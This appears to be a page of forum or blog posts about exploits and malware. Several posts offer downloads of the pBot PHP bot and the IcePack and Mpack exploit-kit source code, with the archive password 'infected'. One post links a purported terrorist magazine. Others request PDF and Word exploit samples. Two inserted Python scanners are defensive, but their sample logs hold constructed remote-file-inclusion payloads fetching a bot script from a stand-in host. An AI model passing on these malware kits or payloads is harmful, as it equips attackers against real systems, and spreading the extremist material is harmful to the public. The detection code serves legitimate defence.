Exploits

pBot - PHP Remote File Include Bug - Web based / PHP bot


Speaking about PHP RFI vulns, this is a classic example.

This is a web-based bot that uses PHP as its base, and is similar to the BlackEnergy DDoS bot in terms of operating from the web.

OC Download pBot Source code (rename extension to .rar)
Here's the Rapidshare Mirror

Cheers :)
Kish

VMware Vulnerability: Time to Upgrade

Core Security found a pretty spectacular vulnerability in VMware. If you have shared folders with the guest OS, a program running inside the VM can modify any file on the host. Given how dependent we are on VMs for malware analysis, it would be a good idea to upgrade. Hats off to Core for finding this bug.

"A vulnerability was found in VMware's shared folders mechanism that grants users of a Guest system read and write access to any portion of the Host's file system including the system folder and other security-sensitive files. Exploitation of this vulnerability allows attackers to break out of an isolated Guest system to compromise the underlying Host system that controls it."

Not detected yet!?

While checking my email yesterday at Hotmail I got an email from a "Nicole Smith". The email had an attachment that appeared to be a valid JPG file: "nicole256.jpg". When I put my mouse on the image I noticed the link on the status bar was not to the "nicole256.jpg" file but instead to another site, "hxxp://201.241.111.30/pics/nicole256.php". Needless to say, it was a spoofed link to an "exe" file. I downloaded the file and scanned it with AVP KAV 7.0 with the very latest definitions and it found nothing. Nope, not even as suspicious. I have included 3 screenshots: what appeared to be a suspicious string in the source code of the Hotmail page, and 2 screen captures of the scan from VirusTotal; several scanners did register it as malware and a couple as suspicious. Is this a new technique/method of infecting? For a long time now, Hotmail has restricted almost all attachments, but this one seemed to get by with no problem.
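The trick described in the post is a link whose visible label (an image file name) does not match what the href actually points to (a .php script on a bare IP that serves an executable). The following is an added example, not code from the post or from Hotmail: a small HTML scanner that pulls every anchor out of a message body and flags a label/target extension mismatch, an executable or script target extension, and a bare-IP host. The message body below is constructed for the example (TEST-NET address 192.0.2.10, not the IP from the post); the extension lists are assumptions, not anything the post specifies.

```python
"""Flag e-mail links whose visible label looks like an image but whose target does not.

Added example with a constructed HTML body; not the message from the post.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit
import posixpath

# Assumed lists for the example: what a label typically claims, and target
# extensions that should never hide behind an image link.
IMAGE_EXTS = {".jpg", ".jpeg", ".gif", ".png", ".bmp"}
SUSPECT_EXTS = {".php", ".exe", ".scr", ".pif", ".com", ".bat", ".asp", ".cgi"}


class LinkCollector(HTMLParser):
    """Collect (href, label) pairs; the label is the anchor text plus any
    <img> src/alt inside the anchor, which is what the user actually sees."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._label = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self._href = a["href"]
            self._label = []
        elif tag == "img" and self._href is not None:
            self._label.append(a.get("src") or a.get("alt") or "")

    def handle_data(self, data):
        if self._href is not None:
            self._label.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, " ".join(self._label).strip()))
            self._href = None


def _ext(name):
    """Lower-cased extension of a file name, path or URL-like string."""
    return posixpath.splitext(name.lower())[1]


def _is_ip_host(host):
    """True for a dotted-quad IPv4 host (no DNS name at all)."""
    parts = host.split(".")
    return len(parts) == 4 and all(p.isdigit() and 0 <= int(p) <= 255 for p in parts)


def classify_link(href, label):
    """Return the list of reasons a link is suspicious; an empty list means none found."""
    reasons = []
    target = urlsplit(href)
    words = label.split()
    label_ext = _ext(words[-1]) if words else ""
    target_ext = _ext(target.path)
    if label_ext in IMAGE_EXTS and target_ext != label_ext:
        reasons.append(f"label looks like {label_ext} but target is {target_ext or 'no extension'}")
    if target_ext in SUSPECT_EXTS:
        reasons.append(f"target extension {target_ext} is executable/script")
    if _is_ip_host(target.hostname or ""):
        reasons.append("target host is a bare IP address")
    return reasons


def scan_html(html):
    """Run every anchor in an HTML body through classify_link."""
    collector = LinkCollector()
    collector.feed(html)
    return [(href, classify_link(href, label)) for href, label in collector.links]


# Constructed sample body: one spoofed image link, one honest image link, one plain link.
SAMPLE_HTML = """
<p>Hi, here is my picture :)</p>
<a href="http://192.0.2.10/pics/nicole256.php"><img src="cid:nicole256.jpg" alt="nicole256.jpg"></a>
<a href="http://example.com/photos/holiday.jpg">holiday.jpg</a>
<a href="http://example.com/">home page</a>
"""

if __name__ == "__main__":
    for href, reasons in scan_html(SAMPLE_HTML):
        print(href, "->", reasons or "ok")
```

Only the first link trips all three checks; the honest image link and the plain link produce no findings. The extension mismatch check is the one that catches the post's case even when the target host is a normal domain name rather than a bare IP.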

Anyone have a sample of the latest PDF exploit?


I'm looking to write Snort and ClamAV signatures for it, but have yet to find a sample.

Possible Terrorist Website ?

Just found this blog, and I have a strong intuition that it belongs to a terrorist group (mujahideen / Taliban / al-Qaeda)??

Check it out if you're just as curious.

A few more sites found...

http://naseeha.wordpress.com/
http://moderatesrefuted.wordpress.com/
http://truthline.wordpress.com/
http://alkarnee.wordpress.com/

and a terrorist magazine: http://202.75.33.137/uploads/teaqny_magazine1.zip

Update: Will try to add random terrorist encryption tools download if I get my hands on them in a while ...

Cheers :)
Kish

The basics of Remote File Inclusion

Many people have heard of it, seen it, and may have tried it. But do they really know what it does? Because there are still a lot of people who do not know what RFI (Remote File Inclusion) actually is, or does, I have decided to write a little(?) tutorial about it. It will basically just explain and 'show' how RFI actually works, and help you understand the basics.

After reading this, you should be able to recognize RFIs, and you will be able to find and use them. At least, that's what I think.

Since this is my first 'tutorial', I would like to have your opinion on it, so leave me a comment.

- KnickLighter's Tutorial
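The pBot post above calls its vector a "classic" PHP RFI, and this tutorial announcement promises to show how RFI works. As an added example that is not from the tutorial or from the pBot code, here is what an RFI attempt looks like from the defender's side: a small scanner over web server access log lines that parses each request's query string and flags any parameter whose (URL-decoded) value is itself a remote URL, which is the signature of a script doing include() on user input. It also notes the classic trailing "?" (or embedded null byte) that attackers append so that whatever suffix the vulnerable script adds, such as ".php", lands in the query string of the attacker's server instead of the path. The log lines are constructed for the example using documentation-only IP ranges; the log format assumed is Apache combined format.

```python
"""Detect remote file inclusion attempts in access logs.

Added example with constructed log lines; not from the pBot post or the tutorial.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache combined log format: host ident user [time] "METHOD target HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Schemes PHP will fetch through include()/require() when allow_url_include is on.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def rfi_indicators(target):
    """Return (param, value, terminated) for every query parameter whose value
    is a remote URL. `terminated` is True when the payload ends in '?' or carries
    a null byte, the usual trick to neutralise a suffix the script appends."""
    hits = []
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; a second unquote catches double-encoded payloads.
        v = unquote(value).strip()
        if v.lower().startswith(REMOTE_SCHEMES):
            terminated = v.endswith("?") or "\x00" in v
            hits.append((name, v, terminated))
    return hits


def scan_log(lines):
    """Parse each log line and collect the requests that carry RFI indicators."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        hits = rfi_indicators(m["target"])
        if hits:
            findings.append({
                "ip": m["ip"],
                "status": int(m["status"]),  # a 200 here means the include likely ran
                "target": m["target"],
                "hits": hits,
            })
    return findings


# Constructed sample: a normal page view, the same RFI payload raw and
# percent-encoded, and an unrelated 404.
SAMPLE_LOG = """\
192.0.2.7 - - [10/Mar/2008:14:02:11 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120
198.51.100.23 - - [10/Mar/2008:14:02:19 +0000] "GET /index.php?page=http://198.51.100.23/bot.txt? HTTP/1.1" 200 812
198.51.100.23 - - [10/Mar/2008:14:02:20 +0000] "GET /index.php?page=http%3A%2F%2F198.51.100.23%2Fbot.txt%3F HTTP/1.1" 200 812
203.0.113.5 - - [10/Mar/2008:14:03:01 +0000] "GET /gallery/view.php?img=photos/1.jpg HTTP/1.1" 404 210
""".splitlines()

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["status"], f["hits"])
```

Both the raw and the percent-encoded request produce the same finding, which is the point of decoding before matching; a local-looking value such as `photos/1.jpg` is left alone because this scanner is only about the remote case the pBot post concerns, not local file inclusion.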

IcePack Toolkit - Source code - Platinum Edition


Uploaded to rapidshare.de as usual; this is just another toolkit like Mpack, but less known. The password is "infected".

OC Download Icepack Source code (rename extension to .rar)
Rapidshare Mirror

Cheers :)
Kish

Mpack Toolkit - Source code


The Mpack toolkit has been uploaded to Rapidshare. I searched the database and found only the dreamhack tool (the compiled form), so I thought it would make sense to upload the source for our members ;)

Click here to download the source code from Rapidshare
OC Download c0ff6e3db8afa6bf598e54afe351d795 (rename extension to .rar)

Password: "infected"

Just tried it on a machine; the contents of the archive are,

MS07-060 / Word 2002 Exploit

Anyone have a copy of this yet?

V.

PDF 0day

Anyone have a sample of the new PDF windows 0day?

V.
